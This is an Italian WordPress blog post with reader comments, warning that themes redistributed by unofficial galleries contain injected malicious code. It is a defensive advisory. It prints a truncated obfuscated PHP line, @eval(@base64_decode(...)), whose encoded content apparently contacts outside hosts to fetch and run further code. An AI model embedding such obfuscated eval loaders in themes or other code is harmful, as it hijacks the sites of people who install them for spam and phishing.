Attenti al tema!


Un post apparso sul nostro forum, ha dato spunto a questo articolo perchè il fenomeno che andremo a descrivere è in aumento. Parliamo di temi wordpress originali o pubblicati su gallery che presentano al loro interno del codice “malizioso”, inserito dall’autore del tema o più spesso dai gestori della gallery.

Un caso abbastanza famoso ha riguardato Seattle-based designer Derek Punsalan designe di Seattle e creatore di molti temi di elevata qualità, alcuni dei quali sono stati rilasciati al pubblico. Oltre che sul suo sito questi temi sono stati copiati da molti altri siti non ufficiali uno dei quali è WP-Sphere. Derek venne a conoscenza della cosa perchè ricevetta una mail da un utente che gli chiedeva come mai nella testata fosse presente del codice simile a a questo:

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\

Dopo aver indagato Derek scopri che il tema era stato scaricato da WPsphere e che su quel sito tutti i temi avevano la testata modificata in modo da contenere quel codice criptico, tramite l’aiuto di persone più tecnicamente preparate di lui si evidenzio che tale codice apriva connessioni con molti siti permettendo a questi di scaricare altro codice ed eseguirlo rendendo i siti WordPress che utilizzavano questi temi dei potenziali zombie da usare per operazioni di spam o di fishing.

In altri casi alcuni autori di temi inseriscono del codice in modo da avere dei link ai propri siti o a siti sponsorizzati che non sono visibili ad un normale utente ma sono perfettamente visibili ai motori di ricerca. Anche se si tratta di comportamenti abusivi, sono ovviamente meno pericolosi del codice descritto in precedenzama si tratta comunque di un abuso. Se un autore desidera avere un link a se stesso o vuole inserire un link sponsorizzato lo dichiari chiaramente, sarà poi l’utente a decidere se mostrarli o meno. L’importante è la chiarezza e l’onesta di comportamento.

Come difendersi da tutto ciò? Ovviamente l’unico metodo sicuro è quello di analizzare il codice del tema utilizzato e identificare l’eventuale codice malizioso. Cosa non praticabile dall’utente medio che magari ha già avuto difficoltà nell’installazione di WP e mastica poco o nulla di PHP.

Di certo un buon metodo che garantisce una certa sicurezza è quello di affidarsi solo a gallery ufficiali come quella di WordPress ( http://themes.wordpress.net/ ) dove i temi presenti sono autorizzati dai rispettivi autori. Nel caso di link a temi presi da altre gallery o siti, cercate di identificare l’autore e quindi il suo sito web e scaricare il tema solo da lì. Ovviamente quest’ultima opzione non ci garantisce al 100% che non vi sia codice per backlink nascosti, ma in poco tempo questi temi vengono evidenziati e segnalati su molti blog e anche noi inizieremo a darne notizia sotto una nuova categoria denominata Sicurezza.

Quindi attenzione a chi vi “offre le caramelle” e nel dubbio chiedete sul nostro forum e cercate su google informazioni sul tema sospetto. Di seguito alcuni link per chi volesse avere amaggiori info sul caso di Derek ed altre notizie sul fenomeno dei temi maliziosi (grazie a MrBrown per la segnalazione dei link)

http://5thirtyone.com/archives/870
http://gigaom.com/2007/11/26/wordpress-themes-security-problems/
http://www.yugatech.com/blog/seo/check-your-wordpress-themes-for-malicious-codes/
http://codescout.org/2007/11/17/audit-those-3rd-party-themes-and-plugins-before-enabling-them/

Hai qualche Domanda o vuoi Commentare?

6 commenti su “Attenti al tema!

Effettivamete è un problema..Ma anche alcuni plugin hanno a volte comportamenti poco corretti o addirittura maliziosi..

La soluzione sul nostro sito è stata di creare un nuovo tema da 0…Lo consiglio a tutti è una grande opportunità per imparare

Reply

infatti, io è da un annetto che mi faccio (e faccio) temi, mi sono stancato di scaricare temi che poi bisogna “svestire” e controllare sempre; e nota ancor più dolente se magari stai in hosting condiviso e apri backdoor rendendo violabile il server pensa sospensione sito, etc..

Meglio cambiare, neh? 😀

Reply

[…] il nostro corporate blog. Sul sito ufficiale di WordPress Italia ieri è stato pubblicato un articolo di Steve Agl con cui si informa la comunità WordPress che ci sono in circolazione dei temi […]

[…] mese fa abbiamo segnalato il fatto che ci sono in giro dei temi di WordPress infettati da codice malevolo. Bene, ora tramite […]

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Archivi

Categorie